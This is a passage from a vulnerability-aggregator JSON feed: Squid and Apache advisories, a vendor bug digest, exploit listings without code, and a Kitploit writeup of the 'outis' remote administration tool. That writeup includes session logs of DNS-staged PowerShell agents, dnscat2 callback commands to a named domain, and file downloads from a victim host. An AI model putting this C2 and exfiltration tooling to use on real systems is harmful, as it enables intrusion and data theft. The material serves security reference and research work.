"2021-09-24T22:25:49", "description": "[7:3.5.20-17.0.1]\n- Multiple CVE fixes for squid [Orabug: 33146289]\n- Resolves: CVE-2021-28651 squid: Bug 5104: Memory leak in RFC 2169 response parsing (#778)\n- Resolves: CVE-2021-28652 squid: Bug 5106: Broken cache manager URL parsing (#788)\n- Resolves: CVE-2021-31806,31807,31808 squid: Handle more Range requests (#790)\n- Resolves: CVE-2021-33620 squid: Handle more partial responses (#791)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-24T00:00:00", "type": "oraclelinux", "title": "squid security update", "bulletinFamily": "unix", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-09-24T00:00:00", "id": "ELSA-2021-9465", "href": "http://linux.oracle.com/errata/ELSA-2021-9465.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2022-01-04T14:41:02", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2685-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nJune 14, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : squid3\nVersion : 3.5.23-5+deb9u7\nCVE ID : CVE-2021-28651 CVE-2021-28652 CVE-2021-31806 CVE-2021-31807 \n CVE-2021-31808 CVE-2021-33620\n\nSeveral vulnerabilities were discovered in Squid, a proxy caching \nserver. \n\nCVE-2021-28651\n\n Due to a buffer-management bug, it allows a denial of service. \n When resolving a request with the urn: scheme, the parser leaks a \n small amount of memory. However, there is an unspecified attack \n methodology that can easily trigger a large amount of memory \n consumption.\n\nCVE-2021-28652\n\n Due to incorrect parser validation, it allows a Denial of Service \n attack against the Cache Manager API. This allows a trusted client \n to trigger memory leaks that, over time, lead to a Denial of \n Service via an unspecified short query string. 
This attack is \n limited to clients with Cache Manager API access privilege.\n\nCVE-2021-31806\n\n Due to a memory-management bug, it is vulnerable to a Denial of \n Service attack (against all clients using the proxy) via HTTP \n Range request processing.\n\nCVE-2021-31807\n\n An integer overflow problem allows a remote server to achieve \n Denial of Service when delivering responses to HTTP Range \n requests. The issue trigger is a header that can be expected to \n exist in HTTP traffic without any malicious intent.\n\nCVE-2021-31808\n\n Due to an input-validation bug, it is vulnerable to a Denial of \n Service attack (against all clients using the proxy). A client \n sends an HTTP Range request to trigger this.\n\nCVE-2021-33620\n\n Remote servers can cause a denial of service (affecting \n availability to all clients) via an HTTP response. The issue \n trigger is a header that can be expected to exist in HTTP traffic \n without any malicious intent by the server.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-14T06:36:59", "type": "debian", "title": "[SECURITY] [DLA 2685-1] squid3 security update", "bulletinFamily": 
"unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-06-14T06:36:59", "id": "DEBIAN:DLA-2685-1:9A36F", "href": "https://lists.debian.org/debian-lts-announce/2021/06/msg00014.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-16T23:32:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4924-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 01, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : squid\nCVE ID : CVE-2021-28651 CVE-2021-28652 CVE-2021-28662 CVE-2021-31806 \n CVE-2021-31807 CVE-2021-31808\nDebian Bug : 988891 988892 988893 989043\n\nMultiple denial of service vulnerabilities were discovered in the Squid\nproxy caching server.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.6-1+deb10u6.\n\nWe recommend that you upgrade your squid packages.\n\nFor the detailed security status of squid please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: 
debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-01T19:38:13", "type": "debian", "title": "[SECURITY] [DSA 4924-1] squid security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-28662", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808"], "modified": "2021-06-01T19:38:13", "id": "DEBIAN:DSA-4924-1:931B6", "href": "https://lists.debian.org/debian-security-announce/2021/msg00107.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "trellix": [{"lastseen": "2021-11-02T00:00:00", "description": "#### ARCHIVED STORY\n\n# The Bug Report \u2013 October Edition\n\nBy **Douglas McKee ** \u00b7 November 02, 2021\n\n## Your Cyber Security Comic Relief\n\n\n\n**Figure 1. Apache server version 2.4.50 (CVE-2021-42013)**\n\n## Why am I here?\n\nRegardless of the origins, you\u2019ve arrived at Advanced Threat Research team\u2019s monthly bug digest \u2013 an overview of what we believe to be the most noteworthy vulnerabilities over the last month. 
We don\u2019t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. If you don\u2019t agree with these picks, we encourage you to write a strongly worded letter to your local senator. In lieu of that, we present our top CVEs from the last month.\n\n### Apache: CVE-2021-41773 and CVE-2021-42013\n\n**What is it?** \n2 CVES / 1 Vuln \u2013 It appears Apache struggled a bit with this latest critical vulnerability, where it took two tries to fix a basic **path traversal bug,** which was introduced while patching last month\u2019s [SSRF mod_proxy vulnerability](<https://vulners.com/cve/CVE-2021-40438>). As path traversal bugs do, this allows unauthorized users to access files outside the expected document root on the web server. But wait, there\u2019s more! This can lead **to remote code execution** provided mod-cgi is enabled on the server.\n\n**Who cares?** \nA quick Shodan scan told me there are at least 111,000 server admins that should care! With Apache being the [second largest market](<https://w3techs.com/technologies/overview/web_server>) share holder of implemented webservers, there is a good chance your organization is using it somewhere. It\u2019s always important to consider both internal and external facing assets when looking at your exposure. Apache is even commonly used as an embedded webserver to other applications and should be reviewed for use in any installed 3rd party applications. Oh yeah \u2013 and if you overlook an instance you have installed somewhere, this IS currently **being actively exploited in the wild \u2013 no pressure**.\n\n**What can I do?** \nOh! I know, use Microsoft IIS! 
If you\u2019re not ready to completely abandon your webserver implementation, I suggest updating to **Apache 2.4.51**. Remember to **avoid version 2.4.50** as it does not patch both vulnerabilities. If you have been an astute system admin and followed the [Apache documentation](<https://httpd.apache.org/docs/2.4/howto/access.html>) using the **default and pretty darn secure** \u201crequire all denied\u201d directive for all files outside the document root, kudos to you! Although patching is still highly recommended, you are not immediately vulnerable.\n\n**The Gold Standard** \nWe recognize in some special cases patching is harder than compiling gcc from source, so McAfee Enterprise has you covered; we have been detecting path traversal attacks in our **Network Security Platform (NSP)** like it was going out of style since 1990 (and it was).\n\n### Win32k Driver: CVE-2021-40449\n\n**What is it?** \nAin\u2019t nothin\u2019 free anymore! Except kernel module addresses on your Windows machines, thanks to Microsoft Windows [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>). This vulnerability is a use-after-free in the NtGdiResetDC function of the Win32k driver and can lead to attackers being able to **locally elevate their privileges**.\n\n**Who cares?** \nAre you currently reading this from a Microsoft Windows machine? Using Microsoft Server edition in your cloud? Local attacks are often given lower priority or downplayed. However, it is important to recognize that phishing attacks are still highly successful as an initial point of entry, facilitating a need for privilege escalation bugs to obtain higher level access. 
So, unless you are a hardcore Linux and Mac-only shop, you may want to patch since this is **actively being exploited** by cybercriminals, according to our friends at [Kaspersky](<https://www.kaspersky.com/blog/mysterysnail-cve-2021-40449/42448/>).\n\n**What can I do?** \nThat boring **Microsoft patch** Tuesday thing still works, or you could just use a superior operating system like FreeBSD.\n\n**The Gold Standard** \nHave you checked out the latest version of **McAfee Enterprise ENS** lately? Detecting exploitation and cybercriminal activity is sort of its thing, assuming you have grabbed the latest signatures.\n\n### Apple iOS: CVE-2021-30883\n\n**What is it?** \nAn [integer overflow](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) vulnerability in the iOS \u201cIOMobileFrameBuffer\u201d component can allow an application to execute arbitrary code with kernel privileges. This has additionally been confirmed to be accessible from the browser.\n\n**Who cares?** \nSince Apple still [reportedly](<https://www.counterpointresearch.com/us-market-smartphone-share/>) holds 53% market share of all smartphone users, statistically speaking your organization should care too. It only takes one bad apple to hack your entire network, and with [reported](<https://support.apple.com/en-us/HT212846>) **active exploitation** in the wild it might happen sooner than you think.\n\n**What can I do?** \nYou should be sensing a common theme in this section \u2013 and, in this case, you actually can take action! 
Stop reading this, plug that mobile device into a power source, and install **the latest version of Apple iOS**.\n\n**The Gold Standard** \nSince you stopped reading and updated already, congrats!\n", "cvss3": {}, "published": "2021-11-02T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 October Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30883", "CVE-2021-40438", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-02T00:00:00", "id": "TRELLIX:3D1BFD2AFBB082262FACCCAE2137672E", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-october-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "Remote Code Execution in Apache\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-07-16T00:00:00", "id": "E-738", "href": "", 
"sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:32", "description": "Path traversal vulnerability in Apache\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "E-739", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-03-22T08:30:29", "description": "### *Detect date*:\n10/07/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerability was found in Apache HTTP Server. 
Malicious users can exploit this vulnerability to execute arbitrary code and obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.51\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.51>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>)7.5Critical", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "kaspersky", "title": "KLA12372 RCE vulnerability in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-21T00:00:00", "id": "KLA12372", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12372/", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-11-04T08:40:00", "description": "[  ](<https://4.bp.blogspot.com/-Si8yaPUMk6A/WbnIMuc83AI/AAAAAAAAI4Q/G6AlC65nXJYeyTQmiODAwngeO5YUb9psACLcBGAs/s1600/outis.png>)\n\n \n\n\noutis is a custom [ Remote Administration Tool ](<https://www.kitploit.com/search/label/Remote%20Administration%20Tool>) (RAT) or something like that. Think [ Meterpreter ](<https://www.kitploit.com/search/label/Meterpreter>) or Empire-Agent. However, the focus of this tool is neither an exploit [ toolkit ](<https://www.kitploit.com/search/label/Toolkit>) (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. \n\n \n\n\n** On the Name **\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. Thus, when Polyphemus later shouted that Nobody was about to kill him, strangely no help arrived. \n\nMy thanks to Marcel for remembering this marvelous piece of classic tale. \n\n \n\n\n** Dependencies for the Handler **\n\nArchlinux users can install the following packages: \n\n * python3 # includes cmd, tempfile, ... \n * python-progressbar2 \n * python-dnspython \n * python-crypto \n * python-pyopenssl \n * and maybe more... \nIn other distributions the names may differ, for instance, there is a module named crypto and a module named pycrypto. We need the latter. 
\nAlso, older versions might cause problems: \n\n\n * pyopenssl needs to be version 16.1.0 or newer, check as follows: \n \n \n $ python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'\n\nYou can set up a python virtual environment quite easily: \n\n \n \n $ virtualenv outis-venv\n $ source ./outis-venv/bin/activate\n (outis-venv) $ pip install progressbar2 dnspython pycrypto pyopenssl\n\nThis results in the following package list, which seems to work for me: \n\n \n \n $ pip freeze\n appdirs==1.4.3\n asn1crypto==0.22.0\n cffi==1.10.0\n cryptography==1.8.1\n dnspython==1.15.0\n idna==2.5\n packaging==16.8\n progressbar2==3.18.1\n pycparser==2.17\n pycrypto==2.6.1\n pyOpenSSL==16.2.0\n pyparsing==2.2.0\n python-utils==2.1.0\n six==1.10.0\n\n \n** Installation ** \nClone this git repository with the recursive flag to also clone its submodules into the thirdpartytools folder: \n\n \n \n git clone --recursive ...\n\nThe handler runs on Python 3. Install its dependencies and run it. It will generate stagers, agents and everything else for you. \nTo bind low ports without needing root privileges, consider using a capability wrapper. \n \n** Terms ** \n\n\n * ** agent ** : software that runs on the victim system \n * ** handler ** : software that parses your commands and leads the agents (usually it runs on your server) \n * ** stager ** : short script that downloads the agent (using the transport module) and runs it \n * ** transport ** : communication channel between stager/agent and handler, e.g. ReverseTCP \n * ** platform ** : victim architecture to use for stager/agent scripts, e.g. 
PowerShell \n \n** Currently Supported Platforms ** \n\n\n * PowerShell (partial) \n \n** Currently Supported Transports ** \n\n\n * Reverse TCP \n * DNS (types TXT or A for staging, and types TXT, CNAME, MX, AAAA or A for agent connection) \n \n** Currently Supported Cryptography ** \n\n\n * Agent stages can be encoded (for obfuscation, not for security) using cyclic XOR \n * Agent stages can be authenticated using RSA signatures and pinned certificates \n * Transport connections can be encrypted / authenticated using TLS and pinned certificates \n \n** Currently Supported Commands and Controls ** \n\n\n * ping requests to test the connection (partial) \n * text message format (partial) \n * upload and download of files \n \n** Currently Supported Extras ** \n\n\n * When using DNS transport with stager and powershell, you can stage the tool dnscat2 / dnscat2-powershell from the thirdpartytools directory instead of the default outis agent. Set the platform option AGENTTYPE to DNSCAT2 (will take a while, but uses only DNS to stage) or DNSCAT2DOWNLOADER (tries to download using HTTPS). \n \n** Usage Examples ** \nDownloading a file using the staged DNS transport with the POWERSHELL platform could look like this: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set ZONE zfs.sy.gs\n outis> set AGENTDEBUG TRUE\n outis> info\n [+] Options for the Handler:\n Name Value Required Description \n ----------------- ---------- -------- -----------------------------------------------------------------\n TRANSPORT DNS True Communication way between agent and handler (Options: REVERSETCP,\n DNS)\n CHANNELENCRYPTION TLS True Encryption Protocol in the transport (Options: NONE, TLS)\n PLATFORM POWERSHELL True Platform of agent code (Options: POWERSHELL)\n PROGRESSBAR TRUE True Display a progressbar for uploading / downloading? 
(only if not \n debugging the relevant module) (Options: TRUE, FALSE)\n \n [+] Options for the TRANSPORT module DNS:\n Name Value Required Description \n --------- ----------- -------- ------------------------------------------------------------------------\n ZONE zfs.sy.gs True DNS Zone for handling requests\n LHOST 0.0.0.0 True Interface IP to listen on\n LPORT 53 True UDP-Port to listen on for DNS server\n DNSTYPE TXT True DNS type to use for the connection (stager only, the agent will \n enumerate all supported types on its own) (Options: TXT, A)\n DNSSERVER False IP address of DNS server to connect for all queries\n \n [+] Options for the PLATFORM module POWERSHELL:\n Name Value Required Description \n -------------------- -------------------------- -------- ----------------------------------------------\n STAGED TRUE True Is the communication setup staged or not? \n (Options: TRUE, FALSE)\n STAGEENCODING TRUE True Should we send the staged agent in an encoded \n form (obscurity, not for security!) 
(Options: \n TRUE, FALSE)\n STAGEAUTHENTICATION TRUE True Should the stager verify the agent code \n before executing (RSA signature verification \n with certificate pinning) (Options: TRUE, \n FALSE)\n STAGECERTIFICATEFILE $TOOLPATH/data/outis.pem False File path of a PEM with both RSA key and \n certificate to sign and verify staged agent \n with (you can generate a selfsigned cert by \n using the script gencert.sh initially)\n AGENTTYPE DEFAULT True Defines which agent should be used (the \n default outis agent for this plattform, or \n some third party software we support) \n (Options: DEFAULT, DNSCAT2, DNSCAT2DOWNLOADER)\n TIMEOUT 9 True Number of seconds to wait for each request \n (currently only supported by DNS stagers)\n RETRIES 2 True Retry each request for this number of times \n (currently only supported by DNS stagers)\n AGENTDEBUG TRUE True Should the agent print and log debug messages \n (Options: TRUE, FALSE)\n outis> generatestager\n [+] Use the following stager code:\n powershell.exe -Enc [base64-encoded stager omitted]\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (34332 bytes)...\n 100% (184 of 184) |########################################################| Elapsed Time: 0:00:16 Time: 0:00:16\n [+] Staging done\n [+] Waiting for connection and TLS handshake...\n [+] Initial connection with new agent started\n [+] Upgrade to TLS done\n outis session> [+] AGENT: Hello from Agent\n \n outis session> download C:\\testfile.txt /tmp/out.txt\n [+] initiating download of remote file 
C:\\testfile.txt to local file /tmp/out.txt\n [+] agent reports a size of 3295 bytes for channel 1\n 100% (3295 of 3295) |######################################################| Elapsed Time: 0:00:00 Time: 0:00:00\n [+] wrote 3295 bytes to file /tmp/out.txt\n outis session> exit\n Do you really want to exit the session and close the connection [y/N]? y\n outis> exit\n\nOr maybe we want to use dnscat2 for the real deal and just use outis to stage it: \n\n \n \n $ outis\n outis> set TRANSPORT DNS\n outis> set AGENTTYPE DNSCAT2\n outis> set ZONE zfs.sy.gs\n outis> run\n [+] DNS listening on 0.0.0.0:53\n [+] Sending staged agent (406569 bytes)...\n 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17\n [+] Staging done\n [+] Starting dnscat2 to handle the real connection\n \n New window created: 0\n New window created: crypto-debug\n Welcome to dnscat2! 
Some documentation may be out of date.\n \n auto_attach => false\n history_size (for new windows) => 1000\n Security policy changed: All connections must be encrypted and authenticated\n New window created: dns1\n Starting Dnscat2 DNS server on 0.0.0.0:53\n [domains = zfs.sy.gs]...\n \n Assuming you have an authoritative DNS server, you can run\n the client anywhere with the following (--secret is optional):\n \n ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs\n \n To talk directly to the server without a domain name, run:\n \n ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg==\n \n Of course, you have to figure out <server> yourself! Clients\n will connect directly on UDP port 53.\n \n dnscat2> New window created: 1\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n \n dnscat2> sessions\n 0 :: main [active]\n crypto-debug :: Debug window for crypto stuff [*]\n dns1 :: DNS Driver running on 0.0.0.0:53 domains = zfs.sy.gs [*]\n 1 :: command (feynman-win7) [encrypted and verified] [*]\n \n dnscat2> session -i 1\n New window created: 1\n history_size (session) => 1000\n Session 1 Security: ENCRYPTED AND VERIFIED!\n (the security depends on the strength of your pre-shared secret!)\n This is a command session!\n \n That means you can enter a dnscat2 command such as\n 'ping'! 
For a full list of clients, try 'help'.\n \n command (feynman-win7) 1> download c:/testfile.txt /tmp/out.txt\n Attempting to download c:/testfile.txt to /tmp/out.txt\n Wrote 3295 bytes from c:/testfile.txt to /tmp/out.txt!\n \n command (feynman-win7) 1> exit\n Input thread is over\n\n \n** Inspirations ** \nThis project was inspired by (and shamelessly stole part of its code from): \n\n\n * Empire: \n\n * [ https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py ](<https://github.com/adaptivethreat/Empire/blob/master/lib/common/stagers.py>) \u2014 generate_launcher uses an HTTP(S) stager \n * [ https://github.com/adaptivethreat/Empire/tree/master/data/agent ](<https://github.com/adaptivethreat/Empire/tree/master/data/agent>) \u2014 stager (step two after initial launcher) and agent (step three) \n * [ https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py ](<https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) script generation and stripping \n * Metasploit: \n\n * [ https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb ](<https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb>) \u2014 CmdStager for bourne, ... 
\n * ReflectiveDLLInjection: \n\n * [ https://github.com/stephenfewer/ReflectiveDLLInjection ](<https://github.com/stephenfewer/ReflectiveDLLInjection>)\n * p0wnedShell: \n\n * [ https://github.com/Cn33liz/p0wnedShell ](<https://github.com/Cn33liz/p0wnedShell>) \u2014 some ideas for AMSI evasion for future use \n * dnscat2: \n\n * [ https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md ](<https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md>) \u2014 ideas on protocol design over DNS \n * [ https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1 ](<https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1>) \u2014 [ powershell ](<https://www.kitploit.com/search/label/PowerShell>) version of the dnscat2 agent \n * dnsftp \n\n * [ https://github.com/breenmachine/dnsftp ](<https://github.com/breenmachine/dnsftp>) \u2014 short script parts for stagers via DNS \n \n** Disclaimer ** \nUse at your own risk. Do not use without full consent of everyone involved. For educational purposes only. \n \n \n\n\n** [ Download outis ](<https://github.com/SySS-Research/outis>) **\n", "cvss3": {}, "published": "2017-09-19T14:00:04", "type": "kitploit", "title": "outis - Custom Remote Administration Tool (RAT)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-19T14:00:04", "id": "KITPLOIT:4143386305519508041", "href": "http://www.kitploit.com/2017/09/outis-custom-remote-administration-tool.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-05T14:37:59", "description": "[  ](<https://4.bp.blogspot.com/--9hNXCN9hCQ/WbnEOt8NWBI/AAAAAAAAI4E/JWACq2Oe7J4jlpruoRhVFfXJYl7AT1W-gCLcBGAs/s1600/binary-skull.jpg>)\n\n \n\n\nThe Pharos static binary [ analysis framework ](<https://www.kitploit.com/search/label/Analysis%20Framework>) is a project of the Software Engineering Institute at Carnegie Mellon University. 
